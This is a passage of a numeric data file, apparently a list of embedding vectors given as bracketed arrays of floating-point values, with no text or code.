5,-0.036744747,-0.00739448,0.052642606,0.0159593,0.035139356,0.0055989064,-0.02622561,-0.06095652,-0.014263695,0.016596802,0.06505548,-0.015459841,-0.0046769227,-0.0085722,-0.0046286914,-0.0056642527,-0.014770211,-0.018357854,-0.02569338,0.015330458,-0.00068384816,0.03685231,0.05082089,-0.050215818,-0.00446647,0.039299995,0.049361087,-0.037139483,0.021941371,-0.013556574,0.047203407,0.023438977,0.011111846,0.014400366,0.028793663,-0.016954916,-0.065229364,-0.021447163,-0.043010846,0.10944664,0.06268506,-0.037077144,-0.029915664,0.049718466,-0.024718605,-0.0128138,0.050226204,-0.011791102,0.10970026,-0.024125699,-0.010313671,-0.019956253,0.030679794,0.0019204761,-0.0011385876,0.024636704,-0.032550346,0.010442467,0.050394885,0.0050960993,-0.01100985,-0.0856694,0.03389383,0.048846662,-0.05303643,-0.025724666,0.05701706,-0.054344855,0.038522493,0.002430318,0.0009975393,0.008988994,-0.020772189,0.059255153,-0.01962309,0.015511929,-0.018120278,-0.05711511,-0.033580393,0.017271863,0.022118224,0.0017938504,0.0034378252,0.008616852,0.034735743,0.02819009,-0.011002819,-0.01245444,-0.012493881,-0.030385831,-0.03476589,-0.009515954,-0.001092802,0.009427005,0.055592768,0.021887671,-0.0070934338,0.044592313,0.01996755,-0.042654138,0.029699437,-0.01588802,-0.033993077,-0.0433012,-0.018221641,0.025214195,0.0060312576,0.05103726,0.047470305,-0.04740518,0.058315694,0.02900459,-0.049330924,-0.012103674,-0.0012544169,-0.032224935,-0.020824833,0.0012940384,-0.029190024,-0.009766568,0.00045630164,0.015393598,0.06551222,-0.032304607,0.0030990196,0.02186539,-0.046870466,-0.03769146,0.05731916,0.00034630985,-0.02220907,-0.028036455,-0.021036115,0.00019009555,0.02888404,0.015323842,0.021461204,-0.06828038,0.011949836,-0.025579352,0.0177513,0.033789936,-0.018011956,-0.029082395,0.046620328,-0.051609203,0.0016427729,-0.012460804,0.025174247,-0.05736622,0.025402868,0.0037345255,-0.033387028,-0.041756377,0.010802667,-0.018879866,0.0809564,0.0030640091,0.0013383,-0.05017899,-0.0057236813,0.03493181,0.009329911,0.07334012,-0.06454729,-0.0640467,-0.04463189,-0.010245588,0.045566294,0.023163887,-0.012309621,0.02395843,-0.06568275,-0.059490405,0.04541193,-0.032076243,0.03936049,0.05956722,-0.029602792,0.035334203,-0.042402547,-0.024853537,0.04485009,-0.08190006,-0.025312038,0.03703077,0.056816354,0.0070073255,-0.029050205,0.023959624,-0.030586544,0.00031925293,-0.049473874,-0.070251755,0.01802392,-0.0036300095,0.07378853,-0.012194649,-0.0021933292,0.018833023,-0.0120984055,0.010647674,0.0035615533,-0.019844871,-0.036650848,0.0048653926,-0.040150203,-0.03651436,-0.009588885,-0.016501702,0.050933603,0.007701391,-0.008604988,-0.048219204,-0.0040851794,-0.029881129,-0.004386021,-0.0102367755,0.05242712,-0.005165648,-0.010811034,-0.06542468,0.02003933,0.02190097,-0.06040297,0.038724113,-0.05757923,-0.05542897,-0.062021136,0.016371245,-0.0054800995,0.0384242,0.027804138,0.065278254,0.05244219,-0.05039172,-0.059045747,-0.0014035027,0.038775634,-0.03641175,0.013436675,0.06906678,0.06240266,0.008225152,0.0731098,0.06174713,0.0062593133,-0.0023952492,0.053591914,-0.0096014105,0.050940026,-0.0032936563,-0.037745714,-0.025939047,-0.034469698,-0.019032478,-0.0044806176,-0.013910037,0.0063999286,0.015087397,-0.014638054,-0.0014143594,-0.046770528,-0.03126346,0.04270926,0.02449475,-0.04117934,-0.011000908,0.029882459,0.020540265,0.060194794,0.02422729,-0.034401514,-0.027211854,0.021031672,-0.02685593,0.040532958,-0.04164405,-0.0017547355,-0.033118874,-0.043052517,-0.028581932,-0.01727532,0.009717964,-0.04363439,0.017604265,-0.016034376,-0.021578662,-0.0071379435,0.0115341125,-0.018649658,-0.027778903,-0.051341057,0.06840029,-0.037428003,0.027054379,0.018378474,0.0634541,-0.019603508,-0.044388592,-0.0029614286,-0.0036637718,-0.010947996,0.0023122642,-0.023851689,0.022704279,-0.012915611,0.0689217,0.04233529,0.073163815,0.015637651,0.020865563,0.0383177,0.018498698,0.025326135,-0.01712744,-0.029732622,-0.011347359,-0.0352438,0.0106088845,0.043824002,-0.032485504,0.053544357,-0.011070749,0.043763034,-0.03222146,-0.013354938,0.014048485,-0.010084853,0.0007414351,-0.066471174,-0.0013933011,-0.0680067,0.014842202,-0.014416956,-0.019097611,-0.018233836,-0.028076211,0.009180964,0.009178969,0.027707718,0.02028719,0.008331095,-0.008556701,0.09282517,0.017081812,0.0077406764,0.0056267767,-0.006660115,-0.00011240483,0.006269543,0.006414613,0.10226079,0.046448898,0.04965702,-0.0076331357,-0.013645245,0.023175707,-0.015326294,-0.059168816,-0.010910684,0.01127778],[-0.00053573155,0.041666564,-0.15167859,-0.058971334,0.07663535,-0.11207748,0.026035799,0.015624627,-0.01737767,-0.03241528,-0.0059393425,0.060031593,0.07698406,-0.037335034,0.0015446587,-0.019162085,-0.0041667554,-0.027415432,-0.0376562,0.053087115,-0.00811405,0.0081700655,0.015720613,-0.024370871,0.08343155,-0.013863662,-0.029569298,0.027428916,-0.021638028,0.04350973,0.04875287,-0.047032867,-0.028819071,0.0069962703,-0.07802082,-0.06650745,0.03693555,0.029578613,-0.010735371,0.025612881,-0.002216096,0.0032115756,0.037930887,-0.013880274,0.06268666,0.0042054118,0.056370962,-0.026141977,0.09353351,-0.09526953,0.019673176,0.035844065,0.040291734,-0.020542525,0.057024613,-0.02321075,-0.0048598535,0.03816041,0.021843705,-0.04296663,0.030161196,0.1270666,-0.037677713,0.075574026,0.023510292,-0.003452887,0.002481646,0.012057514,0.010819392,-0.035981514,0.052299645,-0.020868078,0.030361088,0.04849576,-0.04849066,-0.03249298,-0.009636663,-0.02410557,-0.0028165807,0.030827712,-0.0226904,-0.04369283,0.07577624,0.033065896,0.0099442545,-0.013588915,0.014337668,0.01419607,-0.019476874,0.054101765,0.006633351,-0.011891049,0.030446379,0.011481938,-0.055422664,-0.0071086236,0.009070948,0.030316476,-0.06343787,-0.020840421,-0.03286042,-0.01301639,-0.0063756783,-0.030669322,-0.036910687,0.021294575,0.03487921,0.012579006,-0.01002337,0.005538216,-0.028908607,0.03663481,-0.02878342,-0.0032723008,0.07286795,-0.0018944255,0.01613842,-0.019070428,0.007622396,0.038146112,0.0051041623,-0.012527469,-0.035681106,0.014906252,0.027149359,0.022828922,-0.039884966,0.020387206,0.019965738,-0.047947735,-0.0043701483,0.005208443,-0.020397896,0.011029795,0.02446335,0.08437196,-0.05025379,-0.013743261,-0.0019280555,-0.00981565,-0.0061579435,0.011806788,-0.027696282,-0.04145026,-0.000040099778,-0.03464979,0.014718346,0.007186104,-0.10889975,0.043785855,-0.03908269,0.00014442833,0.001357595,0.000015054636,0.057322767,-0.035521977,0.002363726,-0.005971703,0.017005557,0.03140829,0.03917761,0.017933397,-0.04667499,0.09279215,-0.010509575,-0.062217493,-0.016637787,0.042207588,0.014659412,0.022228988,-0.055711813,-0.001866945,0.015391305,-0.020651963,-0.002103613,-0.00483957,0.06653753,-0.018086715,0.031267066,-0.00022956026,0.03065017,-0.037516538,0.057549156,0.046743076,-0.037703555,-0.023793306,0.01854126,-0.004085901,-0.024958229,-0.015688566,0.080451965,0.010333775,-0.08084616,-0.02751612,-0.041258175,-0.04181329,-0.026108196,0.0054154615,0.026081605,-0.0148024345,-0.05308066,-0.0180008,-0.008792279,0.009919421,-0.0343859,0.007848611,-0.027035013,-0.00009145803,-0.02132845,0.026409961,0.051983975,0.008423622,0.034832858,0.008630797,-0.003250027,-0.014963272,-0.00883336,-0.054195266,-0.040422853,0.034623034,0.02702404,-0.015704602,0.0058952635,-0.0071327314,0.020470848,0.023893926,-0.002162341,-0.0006806243,0.018064303,-0.029039554,-0.031375293,-0.08005601,0.048775267,0.0067337845,0.04355909,0.013013577,-0.020842558,0.077935696,0.018840432,0.012349596,-0.0033567527,0.061772373,-0.006105279,0.020631095,-0.02842257,-0.026815897,-0.0041552703,-0.01987725,0.011527293,0.02846303,0.03482519,-0.0016111324,-0.021667073,0.050921153,0.004317369,-0.040624224,-0.01753657,0.0242881,0.03661518,0.011635554,0.049612693,0.02576586,0.0014530695,-0.04507772,-0.023482086,-0.044899896,-0.058728088,-0.032603998,-0.010880666,0.021204721,0.009073394,0.011651792,0.02141854,0.009101534,-0.008169706,-0.0075417967,0.03782602,-0.035247467,-0.041339226,0.0031257586,-0.013634943,-0.03575619,-0.013337581,0.026886111,-0.031950306,0.036354087,-0.02231517,-0.022658156,0.013846427,0.022398239,0.0030508589,-0.028468361,-0.020559596,0.015642235,-0.02114813,0.026776398,0.035504293,-0.045818143,-0.0039783004,-0.0043132342,0.03816351,0.016281571,0.0148608005,0.031740442,-0.030411089,-0.038973905,0.021308284,-0.0011747954,-0.020365674,0.016357668,-0.055407476,-0.041958857,-0.013814609,0.050802357,-0.011553967,0.029058984,0.004620649,-0.046971522,0.048922326,0.008361224,-0.022984857,-0.06050357,0.019568315,-0.032932855,-0.03469051,0.051378645,-0.037447542,0.007860031,-0.01462765,-0.06512054,0.056265634,0.0399326,0.022939462,-0.06522745,-0.021064552,0.046056636,-0.0039710184,0.02687969,-0.006646712,0.0146502545,0.008124795,0.005031523,0.027450621,-0.032056373,0.01429862,0.008581448,-0.051799342,0.019705957,0.04142279,-0.0075634997,-0.048903648,0.005986532,-0.003291974,-0.035503957,0.0027347892,0.03156807,0.06355639,0.018261094,0.0138923805,-0.0069663073,0.04206242,0.015089522,-0.0077096126,0.041443594,-0.015198969,0.04327423,0.0380786,-0.00022533207,-0.00875934,-0.034956265,-0.014793321,-0.018619053,0.0112975985,0.052185804,-0.035683077,-0.006003563,-0.07458963,0.017164422,0.019699866,0.030078001,0.036639445,-0.05480972,0.03117934,0.015425496,0.022888549,-0.025577398,0.008420008,-0.044668872,0.0049764332,0.058275916,-0.027384557,0.00093835936,-0.033363827,0.00025227913,-0.025780387,-0.035244297,0.0059167147,-0.021860274,-0.016131291,0.016172009,-0.06436974,-0.06385253,0.012926077,0.03895482,-0.01932015,-0.02545742,0.007834097,-0.072043255,0.04916687,-0.00065618625,-0.013033861,0.0035527402,0.055075653,-0.06294885,0.02726331,0.020262076,0.05762393,-0.014978716,-0.008117452,-0.03390609,0.068444535,0.02916299,0.033750582,0.014885297,-0.012693748,0.02852044,0.02022405,0.051207244,0.016126921,-0.078164704,0.03234153,0.027562825,0.010840665,-0.052148994,-0.03063316,-0.020832285,0.035045102,0.06269629,-0.03632746,0.02219538,0.03926774,-0.010235098,-0.028571378,-0.029590797,-0.015477253,0.061126195,0.035505645,-0.062062252,-0.048431482,0.057566665,-0.0039360053,0.024046227,0.014697965,0.01119521,0.112301566,-0.047843877,0.013148129,-0.0028811968,0.008310167,0.03794069,0.010504761,-0.010247622,-0.061998934,0.02838981,0.02789906,0.023432959,-0.01136779,-0.007769264,0.07940408,0.07950903,-0.06067755,-0.0006492025,0.02940182,-0.020597955,0.0074876826,0.04134831,-0.035588726,0.012969179,-0.018809263,0.06997887,-0.009933427,-0.04644734,-0.0143310055,-0.095578805,-0.037352964,0.01648869,0.0048227306,-0.015178723,-0.041690744,-0.035065703,0.038540076,-0.0036760545,0.0174368,-0.033322,-0.020624692,-0.028971607,-0.0015004736,0.048251852,0.018830882,0.028522087,0.033211064,0.010493087,-0.0332192,0.02845635,0.05160145,0.0010553414,0.084271334,-0.06723996,-0.063665465,-0.051922794,-0.0010824258,-0.01449887,0.027451066,0.054870263,0.029824397,-0.028120615,0.041115467,0.029186327,-0.09370104,-0.017223202,0.034433495,-0.04009725,0.0073353983,-0.016975623,-0.07009589,0.019008273,0.036898904,-0.026690936,0.04547659,-0.013872369,-0.017612318,0.012129828,-0.04987891,-0.0059755794,0.009396626,-0.014450061,-0.03160864,0.010215154,0.049654454,0.018672196,0.06720287,0.05757266,0.010868871,-0.007206267,-0.0009196412,-0.042548787,0.005100988,0.027389107,0.007814599,-0.03738764,0.04791889,-0.0786922,-0.011963674,-0.021485945,0.032482315,-0.025786757,0.0028481882,-0.04635705,-0.015531367,-0.03284911,-0.013511834,0.0028224,0.020987697,0.019586131,0.009727064,-0.030861067,0.030847145,0.03330727,-0.0054431534,0.05585997,-0.011042677,-0.076854765,-0.024243135,0.007459448,0.015223729,-0.0008379024,0.0469515,0.0017944315,-0.04913259,-0.031351667,0.05116867,-0.029358849,0.020552587,0.04593585,-0.035475273,0.052821856,-0.038455185,-0.039750367,0.024319958,-0.05802216,-0.024012497,0.036376588,0.04561791,0.008814134,-0.0013214974,0.011773493,-0.019158328,0.004458228,0.010240009,-0.06084996,-0.019726807,0.030345019,0.046195958,-0.059906162,0.029221421,0.05538488,-0.016066153,0.026021423,-0.018599309,-0.039472975,0.032158133,0.01448066,-0.028926048,0.00090578373,0.029547796,-0.038528748,0.021998892,-0.022585683,0.0013331079,-0.027313005,-0.017345479,-0.053877275,-0.00026802396,-0.058689058,0.05091163,0.0058200303,-0.032237604,-0.0036060258,0.0172456,0.02592763,-0.04863739,0.017920129,-0.061269555,-0.024851419,-0.04120859,0.03980735,-0.0098784575,0.044975612,0.041471448,0.042363305,0.023462888,-0.014104558,-0.03665983,0.022856697,0.06319992,-0.0673087,0.0030071477,0.04153549,0.042727716,-0.003350322,0.087886855,0.087123096,0.016658751,-0.017339125,0.01884429,-0.011258792,0.03701926,-0.043599844,-0.062506765,-0.05951674,-0.0025545096,0.022499766,0.008119554,-0.015190133,-0.0026077263,0.0024441862,0.010971775,0.023153005,-0.0871407,-0.031649888,0.020198537,0.010535344,0.00788642,-0.020255452,0.00035015927,0.0318616,0.056870352,0.023018552,-0.04107111,-0.0011785766,0.0063125747,-0.008251712,0.057142958,-0.04613239,-0.05679624,-0.046719775,0.01452001,-0.0015352516,-0.054151706,-0.023864305,-0.066663355,0.0076949676,-0.034065142,-0.02201715,0.011502399,0.036769476,-0.036244657,-0.024692481,-0.04414154,0.056236982,0.0021486245,-0.004688998,0.03962625,0.022533733,-0.02175374,0.0029218178,0.014396414,-0.013187551,-0.03301582,-0.009078018,-0.04514842,0.02207161,-0.002079709,0.024096798,0.05114703,0.029641248,-0.0052688764,-0.029428147,-0.009783503,0.017090276,0.025734987,0.0023703733,-0.07676292,-0.009024746,-0.042422798,0.014974743,0.005655713,0.003602866,0.0068276944,0.008608203,0.023345111,-0.0011554889,-0.02692755,0.013982849,0.0033619972,-0.022058265,-0.03492899,-0.052209754,-0.068285815,0.0053024297,-0.020896804,0.006282983,-0.016353013,-0.017967392,0.012032445,-0.02385361,-0.04024484,0.03250733,0.056140725,-0.022049455,0.05739924,0.016195621,0.033768497,-0.0077753607,-0.0020818086,0.023761854,-0.0024442745,0.072533235,0.0985534,0.0392969,0.036097307,-0.03685472,-0.033462126,0.0046450747,-0.010975938,-0.08585506,-0.050504353,-0.00028892604],[0.03629544,0.058731776,-0.110405065,-0.037330247,0.034737293,-0.0759604,-0.00019048579,0.042622104,-0.010360103,-0.07144538,-0.013745122,0.025502652,0.015889974,0.055828717,-0.027730025,-0.02924487,-0.038098298,-0.041276727,-0.014283734,-0.002141876,0.014251633,-0.012697596,-0.0151813775,-0.06926105,0.10166267,0.017900309,-0.0053861854,0.060360495,-0.012651885,0.07938322,0.055562824,-0.038077205,-0.008259984,0.0076777386,-0.03880591,-0.079105385,-0.031194143,-0.025964634,-0.018555116,-0.005828576,0.007829991,-0.015448712,0.009490798,-0.025836263,-0.014007,0.023471482,0.06870358,-0.018229503,0.062287133,-0.10533227,0.016414924,-0.03436882,0.027122138,-0.088456035,0.04856427,0.02505475,0.010914443,0.03298378,-0.011960134,-0.055797707,0.0511084,0.06606568,-0.022091977,0.051485695,0.02157112,-0.00924309,-0.038258046,0.016705547,0.0037418269,-0.015742622,0.061142337,-0.011748021,-0.0011920816,0.005776823,-0.02806083,0.023059491,-0.035031136,-0.028083397,0.0010277786,0.04998935,-0.007748765,0.027535373,0.06354686,-0.0071638,0.04720787,0.004750409,-0.009874402,0.013162186,-0.055434354,0.031585958,-0.0056851334,-0.015679726,0.004016391,0.05759175,-0.052224077,0.023002991,0.022441223,0.07366732,-0.017290648,-0.013014642,-0.014995294,0.022556571,0.013845865,0.00790258,-0.016320191,0.055755448,-0.0119276205,0.009027017,0.009331835,0.016032176,-0.00717034,-0.0104847,-0.030843407,-0.008862025,0.0035323896,0.037867285,0.080224745,-0.056292076,0.012857373,0.031139819,-0.012863591,-0.045974668,-0.022360545,-0.022108078,0.080166765,0.039939705,-0.0690644,0.002821087,0.026744101,-0.008060364,-0.011837548,-0.0047130366,0.0049095377,0.030769791,0.0016796708,0.044577558,-0.028209576,-0.04743415,-0.0068211365,-0.060198087,0.0035421613,0.01700134,0.0035390013,-0.0021832737,-0.0005901662,-0.028362002,-0.010068853,-0.026096169,-0.025182035,-0.0019267766,-0.049203694,-0.037326753,0.027438693,-0.010128024,0.07168122,-0.025453608,-0.0049042962,0.008310742,0.016707158,0.070290975,0.033333287,0.0058529773,-0.040800385,0.07042639,0.010996938,-0.06687061,0.021442145,0.0352783,0.0059664915,-0.013847955,-0.024337566,-0.043884624,-0.029201798,-0.0018699258,-0.00035920856,0.036145844,-0.0127923675,-0.053678658,0.0306008,-0.01996225,0.034051742,0.03000968,0.047358826,0.06049515,-0.02668245,-0.016127134,0.025203375,-0.041931823,0.040518288,-0.03852746,0.0074878754,-0.015795404,-0.066893704,0.033809334,-0.05069741,-0.044528913,0.022359744,0.0034091165,0.05828744,0.01945294,-0.03269735,-0.054480556,-0.049937643,0.0051474473,-0.0075453226,-0.0021681436,0.0019688976,0.05111868,-0.046660073,0.06223026,0.054012,0.011250092,-0.013750038,0.013336205,-0.02290865,-0.010750998,0.0034590655,-0.05332406,-0.042439952,0.04093205,0.0028410335,-0.008783728,0.049512736,0.01222083,0.03628509,0.023824293,0.008046478,0.02386311,0.017037319,-0.025833188,-0.05832181,-0.105185546,0.030964777,0.0036366635,-0.014874695,-0.005005739,-0.012066187,0.05339739,0.0015154026,0.043884538,0.06337469,0.04972785,0.016310506,0.03289105,-0.010164483,0.015040593,-0.0022028817,-0.026448729,-0.008606577,0.033419114,0.011436782,0.014915716,-0.005781417,0.02302326,0.051313613,-0.036265604,-0.0033692783,-0.01795398,0.03584254,-0.046678673,0.009274692,-0.012519271,-0.06063288,-0.049956854,-0.015090798,-0.028827928,-0.02729867,0.02819845,0.024092244,-0.026975181,-0.02269715,0.0267182,0.049017075,0.06314112,0.0062630945,0.006689723,0.058459193,-0.0051670508,-0.021153178,0.016581284,-0.038624488,-0.013610652,-0.044981815,0.04016623,0.03167839,0.002481331,-0.022727018,-0.023559598,-0.0067180097,0.0065005743,-0.0054158317,-0.00671206,0.02105418,0.049065765,-0.016349142,0.031978466,-0.018653529,0.008790389,-0.006570751,-0.047723804,0.014692012,0.038204543,0.015957803,0.050509255,0.0052419743,-0.050451633,-0.0032105646,0.013955628,-0.015100718,-0.013670554,0.005564906,0.0018190187,-0.034688223,0.04884312,-0.016182516,0.020878084,0.03335764,0.010009386,0.064288676,0.0010495305,0.019536197,-0.03494485,0.030998893,0.0013749873,-0.051880535,0.007011888,-0.0083151385,0.06957879,-0.03314376,0.0077503794,0.03712468,0.0062105763,0.001559589,0.010614221,-0.09659193,-0.0022243455,0.014839974,-0.004943149,0.01411782,-0.002368414,0.07428756,-0.0028497248,0.022050506,-0.04654395,0.021332067,-0.0008647707,-0.02251398,0.0023416434,0.013667459,0.05369851,-0.011505126,-0.013941365,0.026733652,-0.04212902,-0.037983608,-0.017284624,0.016366502,-0.0021189176,-0.024398364,0.027547281,0.019185085,0.050259985,-0.004955899,-0.013756709,0.007602032,0.0454075,0.03737659,0.0030541348,-0.020904472,-0.034819804,-0.042160723,-0.0014743373,-0.016078224,0.037622504,-0.023164662,-0.02872107,-0.027642753,-0.0012477605,0.03842905,0.023987941,0.029682664,-0.0073499954,0.04080982,0.028147321,0.018226497,-0.02713739,0.037932858,-0.0052915527,-0.01123218,0.023387479,-0.003612087,-0.026446851,-0.009810209,0.005498448,-0.032629915,0.019255305,0.0069058505,0.013973593,-0.017184462,0.015547892,-0.051484577,0.006390559,-0.0064952774,0.018015247,-0.033229884,-0.030043703,0.00067047327,-0.030857665,0.0538363,0.053494394,0.04382504,-0.04380594,0.0058606295,0.013056886,0.032920595,0.030778946,0.082962446,0.084472455,-0.0037598338,0.0005127106,0.051277496,0.011403189,0.0051406133,0.0059097637,-0.006059822,0.020264123,0.014580194,0.068843916,0.026286827,-0.06932514,0.009488336,-0.009475956,0.039056946,0.018884271,-0.0058862423,-0.08070055,0.006500252,0.05331066,-0.023640502,0.029121416,0.05507146,-0.018984355,-0.05233096,-0.011115146,0.0009811849,0.0950402,0.11579967,-0.03618006,-0.034419797,-0.011213681,-0.017339254,0.0012743137,0.0021512425,-0.010032728,0.11294457,-0.03987668,0.012580576,0.022792602,-0.01328393,0.02804698,0.00566054,-0.020000571,-0.016522568,0.0053383415,0.00041268015,0.017014198,-0.002888962,-0.011454485,0.091910996,0.1019823,-0.091730624,-0.008714544,-0.015928837,0.020971702,0.031877037,0.02058223,-0.016405731,0.0220554,0.030402578,0.0667916,-0.032760873,-0.04365613,-0.015105046,-0.056276724,-0.037543494,0.016753789,-0.005013765,-0.014092702,-0.034670316,0.00913095,0.04444977,-0.020991348,0.022101095,0.004662688,-0.006702428,-0.053830612,0.02038726,-0.019466506,0.014747561,-0.010346302,0.0022191831,0.05903543,-0.03280191,-0.0007822561,0.04757104,-0.015080411,0.041583452,-0.04516886,-0.060619906,-0.023060191,-0.01434276,0.005125381,-0.0073046302,0.026464824,0.061557457,-0.05674692,0.072040915,-0.057158634,-0.051427968,-0.009014863,0.009642414,-0.008226375,-0.0035281323,-0.012993222,-0.058733627,0.005666352,0.007539421,-0.01303508,-0.00081014103,0.0010400935,0.026153665,-0.027709942,-0.04545566,0.02308839,0.0054041743,-0.020249516,-0.008938158,0.03252541,0.032616958,0.033826128,0.036630053,0.0081355,0.0109935645,0.00615528,0.00629463,-0.021030111,-0.048052356,0.065239586,-0.027194148,-0.030099778,0.057201117,-0.039826155,0.042555444,-0.025297044,-0.0015031026,-0.05352559,-0.023653444,0.0050650323,-0.041458834,-0.040812545,-0.021979187,-0.0414186,0.029054878,-0.0027658583,0.041337524,-0.021186147,0.056861866,0.042497654,-0.004852651,0.047231678,-0.026885817,-0.06121054,-0.047111962,0.019620517,-0.009757005,0.05909266,0.040379878,0.022696737,-0.050365508,-0.040194772,0.04799375,-0.034599833,0.0065652593,-0.0116073545,-0.08446997,0.0076988395,-0.05690295,-0.04046502,0.010895999,-0.021662617,-0.026791962,0.003283924,0.021433143,0.009816983,0.010616391,0.020078007,-0.024379738,-0.004473534,-0.017241666,-0.14810392,-0.03617031,0.020444676,0.032158434,-0.049156416,-0.032861102,0.050464272,-0.004100355,0.0027161734,-0.039873883,-0.03928744,0.028328266,0.014209245,0.005936414,0.0021688303,0.03538712,-0.05226635,-0.035479963,0.017351216,0.00962328,0.017321704,-0.02604764,-0.006205906,0.02101643,-0.09110716,0.054167695,0.0065933326,-0.00006036372,-0.024314493,0.036801312,0.0005046604,-0.028312994,-0.031763513,-0.073998034,-0.05717728,-0.07577713,0.026258176,-0.024676323,0.048846368,-0.01645108,-0.020096466,0.049510296,-0.022811946,-0.0019894144,0.026306508,0.053813424,-0.030202527,0.006977843,0.043017834,0.054918706,0.0080143735,0.047145985,0.05998368,0.02561279,-0.016149523,-0.024761284,-0.0036353345,0.03792878,-0.0040230234,-0.06302052,-0.0522124,-0.0020046602,-0.036521554,-0.061060358,-0.006671272,0.05808396,-0.014657404,0.03220742,-0.012286898,-0.06351736,-0.03200389,-0.028289007,0.036993656,-0.05866975,-0.023077834,0.009473243,0.020918334,0.085232176,0.0077386633,-0.03053715,0.0041307844,0.025147766,-0.031299304,0.020684721,-0.03890746,-0.030549075,-0.04123394,0.0059577622,0.0119125955,-0.04245059,-0.025696494,-0.017580012,-0.01548385,0.0097547835,-0.022380194,-0.03234361,0.023827167,-0.05249693,-0.0337604,-0.038448006,0.06116089,-0.044333164,-0.0068992567,0.01320594,0.048991844,0.0019773422,-0.0038938152,-0.0072628036,0.05233842,-0.016185079,-0.04046571,-0.050528128,-0.032757215,0.00024249221,0.020578533,-0.005231693,0.029185418,-0.01912665,-0.043188255,0.04938049,0.070376776,0.057139903,-0.0018641327,-0.06926011,-0.005401528,0.015591975,-0.045534402,0.024320357,-0.028694505,-0.017424429,-0.0057442156,-0.022832213,-0.005307303,-0.025111597,0.067644514,0.011505412,-0.0493455,-0.06291984,-0.03137315,-0.06866906,0.0037921774,-0.02904605,0.01725875,-0.0070792222,0.007602013,0.026702063,0.029904995,-0.020827694,0.01769496,0.05586859,-0.020329703,0.05029291,-0.044569533,-0.025079262,0.019355787,-0.04226475,0.00465709,-0.020965617,0.06287429,0.10012647,-0.02602942,0.006109057,-0.045659844,0.0016939311,0.038028315,0.023584193,-0.047784425,0.0019661973,-0.024860537],[0.045205176,-0.013694475,-0.13112172,-0.07120109,0.06195965,-0.06711141,0.0071808696,0.03860213,-0.032050055,-0.052213162,-0.03989349,0.01273035,0.063922174,0.050887674,0.028794011,-0.05694094,-0.040476754,-0.08930775,-0.053285852,0.042702373,-0.0019786544,-0.031161966,0.031589538,-0.03049877,0.10919179,0.019540383,0.00020641348,0.051912475,-0.035815507,0.05173865,0.041407786,-0.017263148,0.019296443,-0.0044439454,-0.08076987,-0.068847924,0.05365412,0.0031968644,0.0018328243,-0.02192576,-0.006998329,-0.01249795,0.023485245,-0.043738592,0.043323893,0.01728889,0.0570534,-0.0494311,0.045418926,-0.0889584,0.038099404,-0.0032511984,-0.021312492,-0.07930716,0.05752649,0.019334046,0.009298864,0.044767,0.0019969835,0.004167903,0.015257894,0.06591469,-0.02815798,0.033208046,0.016262079,-0.014321983,0.0038845884,0.03929955,0.03497331,-0.039794154,0.06374714,0.02057339,-0.0068197357,0.014381271,-0.028208844,0.015919238,-0.014588709,-0.013481517,-0.019349754,0.019793874,-0.009826607,-0.0017454547,0.07962786,0.021183698,0.014156125,-0.0131411385,-0.02488798,0.02852628,-0.023361493,0.047423657,0.0018837121,-0.04579835,0.01756823,0.040807087,-0.08055109,-0.02366946,0.030372174,0.05768425,-0.029100893,-0.07324907,0.016099492,0.0009019024,0.004190712,-0.0026386534,0.008964593,0.07454002,0.017702641,0.018536028,-0.03414155,-0.0042888504,-0.042013016,0.02453433,-0.03013342,0.008040173,0.079077624,-0.020570371,0.053710856,-0.039428126,-0.005596625,0.016908657,-0.016456423,-0.05826247,0.020732,-0.0067760325,0.06877756,-0.008789562,-0.06427023,0.020593278,0.017871324,-0.070512496,-0.00055777427,-0.03375154,-0.0037787335,0.031921122,0.027572576,0.056170054,-0.048654824,-0.0223997,-0.020807013,-0.00080157025,-0.006501129,0.025172053,-0.013504823,-0.033595864,-0.003264658,-0.020828333,0.023313204,-0.0345234,-0.038771484,0.06422642,-0.0375325,-0.0117490785,0.0083632395,-0.00022197359,0.04621337,-0.042409785,0.0029204388,-0.01849134,0.029197946,0.0308747,0.012778364,-0.0005848039,-0.0492441,0.060887113,0.011930318,-0.02463178,-0.0060872324,0.039892368,0.010483317,0.0010668614,-0.06255557,-0.0072624497,-0.007295356,0.0040128008,-0.026246341,0.023348557,0.010929633,-0.060685433,-0.0011124759,-0.023913255,0.045961197,0.031649917,0.06394971,-0.007314041,-0.029012684,-0.013382803,0.012282282,-0.016418649,0.04503756,-0.013172656,0.024357716,0.03609228,-0.032779846,0.002212524,-0.035896637,-0.046854492,0.018830301,-0.010643186,0.007345847,-0.016529469,-0.039732553,-0.04194662,-0.033995494,0.013789861,-0.0084576355,0.00079101755,-0.015182845,0.032258477,-0.041938074,0.061468028,0.07469735,0.0016631831,0.030502422,0.0027566256,-0.013078589,-0.0016782696,0.02187142,-0.04277464,-0.042132337,0.017613243,0.028008394,-0.01403326,0.033160422,0.006498394,0.057360217,-0.011087161,0.0050377874,-0.03281714,0.011675202,0.003045519,-0.043895565,-0.10129374,0.014479629,0.04399867,-0.012393575,0.021106355,-0.025334045,0.067939796,-0.027848834,0.06552212,0.00081086974,0.02504412,-0.0095501,-0.004700845,-0.01635494,-0.010868332,-0.0067118388,-0.0025675478,0.003711495,0.019154442,-0.017540121,0.021406772,0.008256326,0.020008069,0.06831704,-0.028736996,-0.021648208,0.008982381,0.051940385,-0.03381032,0.016622087,-0.027860904,-0.0026041097,-0.03656637,-0.04251126,-0.020382823,-0.042107858,-0.018615376,0.024825964,0.009583328,-0.030495344,0.016643217,0.010048152,0.02045926,-0.003099629,0.031448927,0.027410645,-0.027634433,-0.037633352,0.007464984,-0.020081045,0.036024727,-0.033957664,0.009217669,-0.0029015287,0.03331139,-0.009041902,-0.015525017,0.010761487,0.0056425817,0.009802732,-0.032691956,-0.02355422,0.012936443,-0.01103038,0.04368456,0.038651742,0.03390952,-0.020550163,-0.021228297,0.026272649,-0.0009302511,0.05745157,0.03328773,0.005727933,0.01513708,0.022427233,0.013395511,-0.013553498,-0.011157099,-0.02377714,-0.008598713,-0.021534562,0.023907673,-0.05586068,0.013637788,-0.0037937525,-0.052808512,0.038381707,0.0014067062,-0.00018186137,-0.0614455,0.024698721,-0.056245215,-0.02592801,0.05812128,0.014683194,0.044274315,-0.026655693,-0.03788512,0.031086622,0.005908447,0.024422241,-0.030526929,-0.015388068,0.0064522694,-0.0026116997,0.005437529,0.016003512,0.0026261758,0.03371875,0.025543885,0.05241134,-0.0104738865,0.0238406,0.0064995815,-0.043496996,-0.0046355985,0.030301522,0.015949123,-0.016900279,0.024993315,-0.026820334,-0.05182201,-0.009478428,0.027592538,0.020030873,0.02083856,-0.032212406,-0.0